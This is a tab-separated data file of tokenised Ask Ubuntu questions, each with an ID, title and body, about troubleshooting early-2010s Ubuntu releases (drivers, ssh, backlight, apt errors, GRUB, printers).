103888	pingtest.net gives `` packet loss test error ''	this is what i get when trying the pingtest.net on ubuntu 11.10 i do n't have any firewall running on my router . is there a firewall running on ubuntu that i do n't know about ?
103889	how do you stop/restart ssh ?	how do i stop/start ssh in version 11.10 ? i 've tried /etc/init.d/ssh restart sudo service ssh restart sudo restart ssh i get errors every time ... arrrr !
103890	is there a way to completely remove `` recently used '' from open and save dialogs ?	i never use recently used file lists ; i have a filing system so i know where i want to open and save files . i 've read this question : can i stop apps from selecting `` recently used '' by default in file chooser dialogs ? however , i just want this option completely removed . it 's an annoyance to have to keep navigating away from the default . failing the above is there a way to make my home directory the default ?
103894	ca n't drag window into workspace ubuntu 11.10	i just installed ubuntu 11.10 yesterday alongside win 7 to try it out ( and maybe get rid of win ) . i liked the workspace concept a lot , dragging a window into another workspace form the four-workspaces-view . then after some installing i had a crash - ubuntu would not start any more and i hat do go through the ubuntu setup from windows again ( three times until i got rid of the crash problem ) . but ever since the drag and drop function in the 4-workspace view does not work any more . i googled a lot , installed unity and compiz config , changed hundreds of settings but ca n't get it back . everything else ( shift-alt arrow and right clicks on the menubar ) work , but i ca n't click on the miniaturized windows in the workspace selector any more . any idea ?
103896	live cd asks for a username and password	when i boot ubuntu 10.04.3 from a live cd , it asks me to enter a username and password . i have not booted before , and i have n't created an account .
103903	ca n't edit repos in synaptic , ca n't install ati drivers , missing unity compiz plugin	sorry to ask about three issues in one question , but for all i know they are related . i have a desktop running 11.10 , i upgraded it from 11.04 ( i think ) a while ago , but have n't used it seriously until now , and it seems to be pretty broken . firstly , if i try and edit software sources in synaptic , i get a message saying 'the repository information has changed . you have to click on the `` reload '' button for your changes to take effect ' . reloading does n't help ( the message just appears again , and i can never get to the software sources menu ) , but apt-get update does n't report any problems , and i can still update and install software . secondly , i have an ati radeon hd 5800 gpu , and ubuntu does n't seem to think the driver is installed . system info says 'graphics vesa : cypress ' , and the additional drivers dialogue offers the fglrx driver and post-release updates fglrx driver , saying neither is activated ( i definitely had the driver working at some point , probably before i upgraded ) . if i try and activate the fglrx driver , the installation process seems to work , but after i restart nothing has changed [ edit : actually , something does change - additional drivers now thinks this driver is installed , but system info still says vesa ] . if i activate the post-release updates version , i get a message saying 'sorry , the installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log ' . however , sudo apt-get install fglrx-updates fglrx-amdcccle-updates tells me that both are already installed , and the catalyst control center seems to work correctly . also , unity 3d does seem to be working ( at least i get the 3d version of the dash bar ) . i 'm guessing this problem could be because of the issue with software sources ? finally , the unity plugin seems to be missing from the compizconfig settings manager , though i suppose this could be because of the weirdness with the graphics drivers ? is there likely to be a way of fixing all this , or should i just reinstall ubuntu ( i have n't had good experiences with distribution upgrades in the past ) ?
103905	ca n't get nvidia drivers to work on dell latitude e6520 , unity on oneiric	my external monitor works fine when connected to my laptop 's dock using a vga cable . however , with a dvi cable , i ca n't seem to pick it up . googling led me to install the nvidia additional drivers . after installation , i rebooted as instructed , and then tried to run nvidia x-server settings . i got a message telling me : '' you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig ' as root ) , and restart the x server . '' however , after running `sudo nvidia-xconfig ' and then `` sudo service lightdm restart '' , my gui fails to reappear . after removing the xorg.conf file created by nvidia-xconfig , i can get my laptop display back with `` sudo service lightdm start '' , but i ca n't seem to actually get the nvidia drivers to work with x .
103910	nfs is blocked by ufw even though ports are opened	i 've set up an nfsv4 server and it 's working fine , however the firewall is blocking nfs even if port 2049 and 111 are open . i know nfs uses some random ports that change at every boot , but how can i make them static so i can use nfs without disabling my firewall again ?
103913	difference between 'dir ' and 'ls ' terminal commands ?	i 've been trying to find the difference between using the dir and ls commands in terminal . i know ls is the traditional unix method of viewing the files in a directory , and that dir is the windows command prompt equivalent , but both commands work in terminal . if i type dir it displays the files and folders in the directory , and if i type ls it does the same , except with content highlighting . both commands accept options ( i.e . 'ls -a ' and 'dir -a ' both return all files and folders and hidden files . so does anyone know what the difference is and why both dir and ls are used ?
103915	how do i configure swappiness ?	i need step by step , simple and easy way to configure swappiness .
103919	how to install gnome 3.2 in ubuntu 12.04 ?	how i can install gnome 3.2 in ubuntu 12.04 ? it comes preinstalled ? help please ! : d
103921	can i add external device or other icons to the desktop ?	i 'm assuming the unity bar is the bar located on the left hand side of the screen . is it possible to move those icons to the desktop , like a shortcut ? i 'd like mainly all external device icons , like usb and external drives to be moved , if possible . can this be done ?
103922	error while updating `` system does not contain ubuntu-desktop ''	here is the error i get when i am trying to install the updates suggested by the update manager in my ubuntu 11.10 . i have not installed and/or removed gnome/kde/xfce or any other window manager . it is as it was at the time of installation .
103928	how to emulate fn ( function key ) keypress in xte	xte is part of the xautomation package . after hours of man page reading and looking for documentation or working examples , i still can not get xte to emulate a fn-f7 keypress . xte 'keydown meta_l ' 'key f7 ' 'keyup meta_l' i 've tried meta_l , meta_r , multi_key , key f7 , keydown f7 then keyup f7 . no combination seems to work . any idea how i can emulate a combination key press with a fn key from a command/script ?
103930	can i disable the f10 key for all apps without ccsm ?	neither of these answered my question : how do i disable the f10 ( application menu ) keybinding in ubuntu 11.10 ? how do i deactivate f1 and f10 keybindings ? the instructions in that thread seem to be specific to gnome or compizconfig-settings-manager . that application looks a bit dangerous so i 'm wondering if there 's a way to do this without it . there 's a keyboard shortcuts dialog but i could n't find f10 in there . this shortcut is colliding with a shortcut in chrome that is used for debugging . it 's pretty annoying that ubuntu would assume no applications would be using the f10 key . i use at least 3 applications that need that key frequently . i 'm using ubuntu 11.10
103933	triple boot windows , windows 8 and ubuntu 11.10 with grub ?	i have windows 7 and ubuntu 11.10 installed . if i wanted to install windows 8 and triple boot with grub running the show , how difficult would it be ? installing another os is the easy part . it 's the configuring grub i am clueless about . any thoughts ( and directions ! ) would be appreciated .
103942	why am i unable to restart or shutdown my computer from the lightdm login screen ?	i 'm not sure whether this is a bug ( in which case i 'll submit a report ) or i 'm doing something silly ! my problem is that i can not restart or shutdown my computer from the lightdm login screen , this problem occurs if i go through the following steps : log in lock the screen either through inactivity or selecting `` lock screen '' at the password entry screen select `` switch user '' click the power symbol at the top right of the lightdm login screen and select `` restart '' or `` shutdown '' when i do this nothing happens , the computer does not restart or shutdown and neither is there any error messages , i would have assumed that if i 'm not supposed to be able to select these options then i 'd at least get a warning message ? so does anyone know if this is a bug or something dumb i 'm doing ! ? i filled a bug-report on launchpad for this a while ago : https : //bugs.launchpad.net/ubuntu/+source/lightdm/+bug/932724
103945	what does permission denied mean when i attempt to download ubuntu as a windows vista program ?	i am using a dell inspiron b130 with intel pentium m and 32 bit windows vista . is my equipment or system too old ?
103948	same document is printing differently to 2 different printers	i have software that generates pdfs and sends them to print via the lp program . the same pdf prints slightly different to 2 different printers . the font and margins are different . how can i standardize the margins and font between the two printers ? is this just a difference in the drivers for each printer ? before you suggest it , the page-top etc options do not have any effect .
103953	can not format 500gb usb hd : can not create partition table	when i use disk utility i get the following error : error creating partition table : helper exited with exit code 1 : error calling fsync ( 2 ) on /dev/sdb : input/output error gparted also can not create a partition table . smart in disk utility runs fine and tells me the hard drive is healthy . i think the hd was used on a windows computer before . do i need to use a windows computer to fix this ?
103954	ca n't enable digital radeon hd 3870 digital audio	well , ubuntu is pretty much going great for me except for the sound . sound plays using `` internal audio analog stereo '' , and the quality of the music is n't as good as when i use windows . the only other option to enable sound with is my hdmi connection which i do n't want to use . if anyone knows how i would be able to enable my normal digital audio , that would be great . i ran a command from the terminal and the device is found . i just ca n't figure out how to enable it .
103958	downloads stopping halfway in the ubuntu software center	install archives ( ) failed : selecting previously deselected package indicator-multiload . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % dpkg : unrecoverable fatal error , aborting : reading files list for package 'linux-headers-3.0.0-15 ' : input/output error error in function : i 'm new to ubuntu , and i do n't know where to go from here . this is preventing me from downloading anything . i 've also had quite a few problems with ubuntu in the last few days , i 've done four installs . it would seem whenever i update it , and i restart my laptop like prompted , it stays in infinite boot loop . only solution is to re-install . at least that i 've figured out . thoughts ?
103963	what is recommended for people who ca n't stand unity ?	unity just is n't for me . i miss the widgets you could add to the old gnome panels . i tried to get gnome working like it used to in the newest ubuntu but it proved too difficult . eventually i gave up and installed mint . from what i 've read about the subject , canonical 's decision to make their own ui is n't universally popular , so i assume that there are some decent alternatives . what would be a good course of action for me to get my system back how i want it . should i install debian ?
103965	how to determine if cpu vt extensions enabled in bios ?	i know the command to figure out if a cpu can support vmware workstation 8 or vmware player 4 : $ grep flags /proc/cpuinfo flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp *lm* constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl *vmx* est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 popcnt lahf_lm arat dts tpr_shadow vnmi flexpriority ept vpid and then look for the vmx and lm flags but , it seems that even if intel virtual technology extensions ( i.e. , vt or vt-x ) are disabled in the bios , the /proc/cpuinfo will report the same flags . so , how can i figure out from the linux command line ( specifically ubuntu 10.10 in my case ) if vt is actually enabled without reboxing the box ?
103968	gconf-editor settings not being saved	recent gconf-editor settings in terminal gconftool-2 -- type int -- set /desktop/gnome/thumbnail_cache/maximum_age `` -1 '' can not make setting stick . i can change the setting if the integer is a positive number but it will not resort to minus number
103969	screen switches to 1024x768 at login	whenever i login , the screen resolution is always set to 1024 x 768 . with a 1366 x 768 monitor , i end up with two large black bars on the sides of the screen , and i have to manually set the resolution back to 1366 x 768 via system settings . this does not affect the ubuntu login screen ; it occurs only after i log in . how can i make my computer automatically start up at the correct resolution ?
103972	how can i use gnome shell 's menus in unity ?	i am messing with unity and trying to tweak everything in order to have a more customized desktop . using gnome shell , anyone can see that the menus are different in the top panel . they have transparency and look like a bubble sort of . you know what i am talking about , right ? is there a way i could use the same menus for unity or is that not possible ?
103974	how do i remove this root folder link on my desktop ?	the folder is seen on the desktop screenshot here ( che 's home folder symbol at the bottom ) . it does n't let me delete , move , rename , or anything ... i do n't know what to do next . i 'm running 11.10 without unity .
103978	how do i setup a dell 1135n laser mfp ?	trying to setup dell 1135n laser mfp on ubuntu 11.10 /usr/lib/cups/filter/rastertosamsungspl failed i copied the rastertosamsungspl from the dvd /media/dell_mfp/linux/i386/at_root/usr/lib/cups/filter to /usr/lib/cups/filter starting the process i add the dell 1135n laser mfp from the system settings and thats as far as i have been able to get . any help would be very appreciated ! troubleshoot.txt
103979	synaptics touchpad stops working after hibernating a dell xps 16	i am currently experimenting with using ubuntu as a my main os instead of windows 7 . so far , pretty much everything is working fine , except for an issue that i am having with my touchpad . i have a dell xps 16 ( 1640 ) with a synaptics touchpad . it works out of the box , but it seems that it stops working after returning from hibernation mode . this problem has also been addressed in an earlier bug : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/317270 but judging from this bug report , it should be fixed by now . i am running the 2.6.35-23-generic-pae kernel . any ideas ?
103983	whats the difference between ubuntu 11.04 and pinguy 11.04	system wise are they not the same ? i know pinguy has add-ons but works just like ubuntu under the hood .
103986	installed kernel 3.2.4 in natty can not remove 2.6.38-13	installed 3.2.4 from oneric mainline and boots and runs everything perfectly . however can not remove 2.6.38-13 without it claiming a broken package . have used synaptic to fix broken but still can not remove .
103995	building multiple packages for deployment on different ubuntu versions	i need to build debs for ubuntus lucid on . i know i can set up vms/chroots , etc to make a distribution per build , but is there a mechanism from my oneiric machine to do something like : ubuntu-dpkg-buildpackage -- distro=lucid and have a lucid deb be generated ? as a quick note , this is for internal packages , and thus can not be farmed out to launchpad or whereever .
103996	can i add a personal launcher to favourite toolbox in gnome shell ?	i 've installed ubuntu 11.10 . is it possible to add a personal launcher to favorite toolbox in gnome shell 3.2 ? i 've installed firefox from pre-compiled binaries and longman dictionary but can not manage to add launcher to favorites .
104003	will ubuntu live cd/dvd work with no hard drive installed ?	i have no hard drive installed , only usb thumb drive . will this be a problem ?
104006	can not change system file	need to be able to edit this file : /sys/class/net/eth0/queues/rx-0/rps_cpus the file permissions : cd : /sys/class/net/eth0/queues/rx-0 $ ls -l total 0 -rw-r -- r -- 1 root root 4096 2012-02-13 17:23 rps_cpus -rw-r -- r -- 1 root root 4096 2012-02-13 12:54 rps_flow_cnt cd : /sys/class/net/eth0/queues/rx-0 $ ** tried this : $ sudo rm /sys/class/net/eth0/queues/rx-0/rps_cpus ; sudo sh -c `` echo 1 > /sys/class/net/eth0/queues/rx-0/rps_cpus '' rm : can not remove `/sys/class/net/eth0/queues/rx-0/rps_cpus ' : operation not permitted
104023	how to disable mysqld in 10.04 ?	i have a few ( linode ) ubuntu 10.04 ( 64bit ) vpses , and mysqld keeps starting on every reboot on all of them -- $ uptime 16:32:26 up 1 min , 1 user , load average : 0.09 , 0.08 , 0.07 $ ps -ef | grep -i mysqld | grep -v grep mysql 2364 1 0 16:17 ? 00:00:00 /usr/sbin/mysqld $ sudo sysv-rc-conf -- list mysql mysql 2 : off 3 : off 4 : off 5 : off $ sudo chkconfig -l mysql mysql 0 : off 1 : off 2 : off 3 : off 4 : off 5 : off 6 : off $ sudo /etc/init.d/mysql stop $ ! ps ps -ef | grep -i mysqld | grep -v grep how else can i turn it off ? p.s . i raised this question to linode but they are unable to answer .
104032	brightness keys do n't work on a toshiba satellite t110	ok well i have tried close to every single post about this problem that i could find and can not find a perm a fix for it . the fn + brightness up/down buttons do not work at all they show it changing the brightness but it is still as max brightness and it starts to burn your eyes after a while . what can i do to fix the problem ? i 'm using the full desktop version of ubuntu .
104035	dell inspiron e1405 can not get wireless card to turn on	i have recently just downloaded ubuntu 11.10 and before i installed , wireless worked perfectly in windows . now that i have downloaded and installed ubuntu , i no longer have windows . i do not have a wired connection at my house , only a mifi , so my computer is useless now without internet . i really like the functionality of ubuntu , but need internet . i have already run the additional drivers page and it says it has installed the driver for my broadcom wireless adapter and is working . the laptop has a fn+f2 to turn on the wireless adapter when in windows , but this does not work in ubuntu . i am new to linux so i really need some help . thank you all in advance .
104038	how to migrate wubi install to a new partition	sorry if this has being asked before . i have 2 partitions one is my windows install the other is blank . i installed ubuntu 11.10 into virtual disc on my windows partition as kind of a test run . how do i move it to a new partition ?
104039	wired unmanaged after playing with vpn	i was trying to install vpn server and followed some 'tutorials ' and now i end up with eth0 - unmanaged . when called 'network-admin ' there is no tab 'connection ' just general , dns , hosts . wifi works fine , but cable looks dead . it says 'wired unmanaged ' and no option to reset or ad new connection or any 'manage ' option .
104043	how do i do a chrome offline installation ?	how can we install google chrome in ubuntu 11.10 in offline mode ? ( standalone installer for google chrome in ubuntu )
104046	how do i recursively copy/download a whole webdav directory ?	when i attempt to copy a folder from a webdav server to a local disk using nautilus , it copies what appeas to be a manifest file ( xml with the directory listing etc.. ) . with cadaver i get an empty file . i would like to be able to recursively copy a whole directory tree . does anyone know how i can do this ? ps : i 'm using ubuntu 11.04 with nautilus 2.32.2.1 and cadaver 0.23.3
104047	how to configure proxy settings `` syntax error *extra junk at end of file ''	i got the following error after configuring proxy in /etc/apt/apt.conf as acquire : :http : :proxy http : //192.168.96.0:8080 : e : syntax error /etc/apt/apt.conf:2 : extra junk at end of file . and i do n't have the proxy authentication . how do i fix this ?
104056	why does powertop think i have two displays ?	ok , so in powertop ( version 1.97 ) , in both the `` overview '' and `` device stats '' sections , i see two devices , each called `` display backlight '' . one shows the correct percentage of use , e.g . if i lower screen brightness then the use goes down , but the other is always at 100 % ! the 100 % one is always consuming around 2.3 watts , so of course i am interested in killing this thing off , whatever it is . so my question is : why is powertop doing this ? is there some technical way in which i do have two displays ? i have a macbook air , and i 've never even once attached it to an external display . update : even stranger is that when i start up my system , the `` display backlight '' at 100 % is only using 800-900 mw ; however , over time , it will work its way up to 2.3 w .
104057	where to get cgidemo of vnstat ?	i have installed vnstat and now i would like to have statistics in my browser like this : you can see working script here . where can i get that cgidemo script ? source : http : //humdi.net/vnstat/
104062	my canon lbp3010 printer was installed but ca n't print	my canon lbp3010 printer was installed successfully but it does n't print anything . i used the cap 2.3 version . the printer is added and connected to localhost . once a print order is issued , the print job completion message appears but nothing is printed .
104063	how can i know the number of bad sectors on my hard drive ?	i know how to to check / repair my hard drive but i do n't know a way how to see the number of bad sectors on my hard drive . p.s . it looks like my hard drive will die soon : - (
104064	where do i get the latest boost/libboost for 10.04 ?	i 'm unable to install libboost-all-dev package versions 1.42 or latest in ubuntu 10.04. only boost1.40 is installing . but i need 1.42. what should i do ? when i tried to install 1.48 boost i got the following error : robotics @ robotics-desktop : ~ $ sudo dpkg -i libboost-all-dev_1.48.0.2_i386.deb selecting previously deselected package libboost-all-dev . ( reading database ... 224047 files and directories currently installed . ) unpacking libboost-all-dev ( from libboost-all-dev_1.48.0.2_i386.deb ) ... dpkg : dependency problems prevent configuration of libboost-all-dev : dpkg : error processing libboost-all-dev ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : libboost-all-dev what should i do ? should upgrade to 11.10 ?
104066	enable wi-fi in recovery terminal	how do i enable wifi from the ubuntu 11.10 netroot recovery terminal ? after just 12 hours with ubuntu , i managed to destroy my ati fglrx drivers and now i ca n't repair them without internet access .
104068	what is the different between cryptsetup and truecrypt	i used truecrypt volume until now , because the space limitation i looked for other solution to encrypt my data . this is what i found . my question is what is the different between cryptsetup and truecrypt . is cryptsetup as safe as truecrypt ? what is the best way to encrypt an lvm partition ?
104070	what is the best way to check ( and repair ) hard drive for bad sectors ?	i used the following utilities to check my ext4 partitions : fsck badblocks google and so also suggest smartctl . i 'm just wondering what are the differences between all those tools and which one is better .
104071	when plugged in my laptop 's cpu load gets higher	when i plug in my laptop ( asus eee pc with brazos ) it ca n't play a movie without lagging . when i unplug my laptop from the power socket , the lag goes away . i 'm a bit baffled by this because i expected this behavior to be the other way around . i 'm on the latest xubuntu . is there a place where i can extensively check the powerplans , as the default power manager is quite poor .
104075	how to start contributing to ubuntu development ?	i 'd like to contribute to ubuntu development some day . if you 're a developer of ubuntu could you tell me/us what are the prerequisites to start ? what languages and technologies are needed to know , how to make familiar with development ( overview over the project ) and development process ? i am interested in the core of the distribution , the main parts , not writing applications . i 'd like to read some advice from the developer who has already some experience and can say the main points of his learning path and difficulties ( that are general enough for typical ubuntu distribution developer ) he had to overcome .
104077	can i install the gui from zorinos ?	i 'm current using ubuntu 11.10 and want to `` try something old '' on my machine ( window-like gui ) . so if anyone know how to install zorinos gui on ubuntu 11.10 system ( like we can do with kde ) , please tell me about it . many thanks !
104078	buttons do not respond in motif programs	i am trying to install an application in ubuntu 11.10 that uses the libmotif libraries . i notice that the buttons do not respond . when i move the widget a bit and then try , the buttons are responsive . could any one please tell me if the motif libraries are broken in ubuntu11.10 ? if so is there any workaround for this problem ?
104079	how do i install qtsdk for harmattan target development ?	i want to make development targeting harmattan ( aka meego / meamo6 / n9 ) . my first try was to install qtsdk directly from nokia installer . this works . but i would rather install thinks using ubuntu 's package management . so my question is : will installing qt-sdk provide harmattan target ( on precise , where qt-sdk seems to be version 4.8.0 ) ? if not ( maybe for licensing reasons ) , is there a way to add harmattan target to a package installation afterwards ? thanks .
104081	vim error_log at 95.5 % cpu and 55.0 % ram !	my server has been crashing , a quick check of ps aux shows : root 11905 95.5 55.0 1151616 1135256 pts/0 r+ 09:05 40:38 vim error_log surely this ca n't be right ? am i reading this right ? this seems to be very dire ! if this is really using 95 % cpu and 55 % memory then how can i stop it/fix it ? thanks
104083	is there an application to control which windows are on top of others ?	some programs ( such as vlc ) allow you to set them to be 'always on top ' , but is there a way to do this for other programs ? perhaps there is an application that allows you to manipulate windows in this way ? or metacity settings ? there was such a thing in windows so i 'm almost certain some linux geek has thought of it . ; )
104086	problems with google earth	how to put in a normal font in google earth and correcting bugs logging in ? i use 64-bit ubuntu 12.04 lts on my notebook , lenovo n500 . i tried the methods from this site and the site www.omgubuntu.co.uk . all methods have failed . besides the ugly fonts i can not log into skype or to log into my google account in google earth . for skype , not to worry because i do not use it much , and i have it on windows 8 consumer preview and on my android smartphone , lg optimus 2x . but google earth for android is not available in my country . given that i use ubuntu more than windows this represents a problem to me . what should i do ?
104094	how to install utorrent step by step ?	i am trying to install utorrent instead of using the torrent apps and i just came off windows seven can someone help me ?
104106	sync video to audio bpm	hi what i want to do is play a music playlist and then vary the playback speed of a video file based on the current music tempo . basically its for indoor cycling , running i want to vary the speed of the scenery based on the music tempo .
104107	unable to install	i have been trying to install ubuntu on my pc for some time now . i tried wubi , but am unable to get it right . then , i downloaded the iso and tried to install it on an empty without partitioning , but the keyboard acts wierd and goes on typing automatically one particular letter that was typed while trying to enter ipv4 settings ( 2222222222 or ... ... ... ... , etc ... ) and also i get an error about some fsyncing\sdk\resourses something like that . please help me . update : i managed to install it but i get a blank screen after logging in . just the wallpaper shows up ! help me .
104112	no brightness control , hp dv3500 laptop / geforce gpu	i feel almost stupid asking a brightness question with all the similar ones out there , but i have n't yet found a working solution , so here goes : system hp dv3500 series laptop ( dv3550eo - scandinavian version ) with a geforce 9300m gs graphics card , drivers version 280.13 running on ubuntu 11.10 . the system keys for changing brightness are fn+f7 and fn+f8 , respectively , but nothing happens - i ca n't change the brightness . a few of the tricks i 've tried : the same tricks this lenovo owner tried : unable to change brightness in a lenovo laptop this : http : //ubuntuforums.org/showpost.php ? p=11543948 & postcount=40 triedls /sys/class/backlight/acpi_video0/brightness also for acpi_video1 and acpi_video2 . nothing was found for any of them . i 'm guessing it 's a driver problem , but i 've already installed the nvidia drivers ( there was a popup upon first restart after install ) . i apologize in advance for not reiterating the rest of the suggested fixes i 've tried , as they are too numerous for me to remember , and have frankly left me exhausted . i hope a user with a similar computer to mine has found a fix , elsewise i fear this shall be the fourth time over the years i 've given linux a crack only to give it up again within a fortnight : -/ fingers crossed for a solution .
104116	alt+tab completely broken	when i have many windows open ( 2 or more ) , i want to alt tab through them . sometimes , it lists the windows correctly but more often than not , i do n't see any of my open windows . i have to super + w to see the windows at all and they still do n't even show up in alt+tab . is this standard in unity ? using ubuntu 11.10 .
104120	how can i transfer photo 's from my kodak camera that normally would use kodak easyshare software ?	normally i would plug my camera into my windows xp pc , and the software would auto start , and transfer the files to a set location . i need to be able to perform the same or similar function on my pc installed with ubuntu 10.04 ( lts ) . i would like to plug the camera in ( usb ) , and then be able to select the files i want . at the moment , the camera does not seem to recognise the pc . i do not want to rely on the windows pc anymore .
104126	can i purge configuration files after i 've removed the package ?	i was doing a package removal with apt-get remove but then realized i should have done a -- purge along with it to remove the configuration files . can i remove the packages configuration files easily or do i need to reinstall the package and then remove with a -- purge ?
104128	how can i install dog tail	does anyone have a detailed and accurate reference on how to install dogtail ? i tried to install it , but i come up against problems .
104135	preseed late_command not running	i must be missing something obvious . i 've taken over the development of a customised ubuntu installation , which uses the 11.04 desktop live iso with a customised preseed file to make the installation of a new pc completely automatic - build the iso with the uck tools , burn it to a dvd , boot a pc from the dvd , go for a nice cup of tea , and come back to a finished installation just waiting for you to click to reboot into the new system . it all works fine except for this : i can not get a late_command in the preseed file to run . everything else in the file works fine - partitioning , choosing packages , creating a user , etc - but the last line of the preseed file : d-i preseed/late_command string /bin/echo `` trying echo '' > /var/log/myfile ... does n't happen . i 've tried every possible combination of in-target and prefixing /target/ to my paths . i 've sshed to the machine while the automated installation is running and verified that my output paths exist and are writable . i 've checked the kernel command line to make sure the right preseed file is being used . my late_command command just sits there , refusing to be run . we 've been sitting here staring at each other , for quite some time now . my brain has started dribbling out my ears , and i 've just plain started dribbling . is there some crucial piece of ancient oriental preseed-fu i 'm missing ? i 'm at my wits ' end here ( and my mum will tell you i did n't have far to go ) - any help will be most appreciated .
104137	is it possible to unset root password ?	is it possible to unset the root password once it has been set in ubuntu ? am trying to run a backup using arcserve r16 backups agents . i run it as the admin user but of course it does not have root permissions without sudo , which the backup agent does not run ( or support ) . my thinking , to get an initial full backup , was to enable the root account and then run the backup as that user and then remove the password afterwards . do not think this is strictly best practice but have been scrathcing my head over this for awhile now : (
104138	what features does vim-tiny have ?	so , the cut down vim-tiny is installed by default in ubuntu . i do n't mind using it , but i ca n't find documentation and most of the commands i 'm used to from normal vim do n't work . so far i 've discovered that : n and : n go between buffers and : split splits the screen ( but ctrl-w+s does not ) , : close closes a split , and ctrl-w+w hops between splits . what other commands am i missing ?
104141	is it safe to upgrade my web server from ubuntu 11.04 to 11.10 ?	currently , im planing to move my site to mediatemple . when installing an os in the server , the latest ubuntu version they show is 11.04 . so , is it safe if i update it to 11.10 with `` do-release-upgrade '' ? the server is new and i have nothing to loose yet ! ps : i just found out why mediatemple is not supporting oneiric ! ubuntu 11.10 have a nasty bug where the upstart will take nearly 100 % of your cpu ! it effects some users who use virtual machines ! it also does n't reboot correctly ! i think i have to stick with natty for now . i 'll upgrade to 12.04 as soon as they release it ! anyway , thanks for your answers !
104153	indicator-sound does n't compile	currently i 'm trying to get started with indicator development . to get a feel for it i want to play with indicator-sound but if i try to compile it i get the following message : configure : error : package requirements ( gtk+-3.0 > = 3.0 indicator3-0.4 > = 0.3.19 dbusmenu-gtk3-0.4 > = 0.5.90 libido3-0.1 > = 0.1.11 libnotify > = 0.7.0 ) were not met : no package 'dbusmenu-gtk3-0.4 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables applet_cflags and applet_libs to avoid the need to call pkg-config . i already tried to install the package but it has the prefix `` gir1.2- '' and is not listed in pkg-config . i also tried to rename the package in the configure.ac file ( but it does n't work ) . is there a way to get it compiling ?
104155	center a window via command line	is there a way to either place a window in the center of the screen after it is opened , or cause it to open in the center of the screen ? this needs to be done using command line .
104160	`` method driver /usr/lib/apt/methods/https could not be found '' update error	sudo apt-get update e : the method driver /usr/lib/apt/methods/https could not be found . michael @ ubuntu : ~ $ sudo apt-get clean michael @ ubuntu : ~ $ cd /var/lib/apt michael @ ubuntu : /var/lib/apt $ sudo mv lists lists.old michael @ ubuntu : /var/lib/apt $ sudo mkdir -p lists/partial michael @ ubuntu : /var/lib/apt $ sudo apt-get clean michael @ ubuntu : /var/lib/apt $ sudo apt-get update e : the method driver /usr/lib/apt/methods/https could not be found . e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? michael @ ubuntu : /var/lib/apt $ sudo apt-get update e : the method driver /usr/lib/apt/methods/https could not be found . why am i getting these errors when doing an apt-get update ?
104162	decrease backlight below minimum	i have this laptop that does n't handle the backlight very well . in /etc/default/grub , i have added a acpi_backlight=vendor function to get it to work at all . which is cool , and the backlight now actually works , but the minimum backlight setting is still pretty high . is there any way to decrease the backlight below minimum ? i do n't mind having to type in the terminal to do that , as i wo n't need to do it often ( just at night etc . )
104169	i get this error while updating and installing software : perl : warning : setting locale failed	i just installed ubuntu 11.04 in my mt server and i keep getting this error : perl : warning : falling back to the standard locale ( `` c '' ) . perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . it comes mostly when i try to install or upgrade software ! how can i fix this ?
104178	what will happen if i remove shotwell ?	if i install gthumb and make it my preferred image viewer , then what will happen if i remove shotwell ? i 'm asking because , in unity 's dash , there is a huge shotwell icon that says `` view photos '' . so , i 'm wondering what will happen to that icon and ubuntu 's default photo viewer .
104183	how do i map lock screen to `` super+l '' i.e . win+l ?	i want to map my super+l so that when i press the combination my screen is locked . how do i do that ?
104184	how do i collaborate and share presentations , pictures , etc in ubuntu one ?	i would kindly like to know how i collaborate and share presentations , pictures , etc . in ubuntu one . please help me in the simplest way possible as i 'm new to ubuntu one .
104186	any application which could sync pics/videos on ubuntu with picasa web album ?	since picasa is no longer available on ubuntu ( and i dont want to go for the workarounds for installing it ) , is there some application available in ubuntu which can sync albums with picasa web albums ?
104187	change thunars default `` copy of '' tags	is there any way other than hacking the source to change the tags that thunar adds when you copy & paste files . ie.. copy & paste of file.txt 3 times results in : copy of file.txt another copy of file.txt third copy of file.txt i 'd like to change it to something that increments to the end of the filename so the copies stay grouped with the original file in the default name sorting .
104192	intel 945gme x86/mmx/sse2 driver	hd videos in youtube does n't run good on my lenovo s10e laptop . if someone can bring me a full guide of installing which is clear , i 'll appreciate it much . i 've tried one site but it was to complicated to me . please help ! thank you !
104193	ca n't calibrate color manager on thinkpad sl 500 ubuntu 11.10	im unable to calibrate my screen on ubuntu 11.10 ( thinkpad sl 500 ) . the calibrate button is disabled .
104196	how do i prevent the sleep button from locking the screen	my keyboard has a sleep button . i defined a shortcut in system settings , keyboard > shortcuts > own settings ( or similar ) , so that the sleep buttons runs a script . that works . but since my upgrade to oneiric , something also locks the screen ( in the same way the screen is locked when i press ctrl+alt+l ) . can i disable that behaviour ? what 's the name of that lock screen ? i tried hiding gnome-screensaver and /etc/acpi/ and i looked in gconf-editor /apps/gnome-power-manager/buttons . i did n't find anything related in dconf-editor .
104197	how can i unmap mod4+s and mod4+m in ubuntu	mod4+s and mod4+m ( or super+s and super+m ) are mapped to invoking the session management menu ( on the rightmost of the gnome panel ) , and to minimizing the current window . how can i disable them ? they are not shown in system > preferences > keyboard shortcuts .
104199	how to install eclipse on ubuntu server	i have a new machine with ubuntu server . on that server i would like to have apache with some web services . but how do i install eclipse on ubuntu server ? right now i have no gui , just command line .
104200	how do i change the main display ?	i have a 22 '' display and a 19 '' display , the 19 '' is the default display , at the moment , how would i go about making the 22 '' display and work as how it should ( like how window 's manages it ) with the icons on the right display etc etc.. : ) hope you guys can help me out !
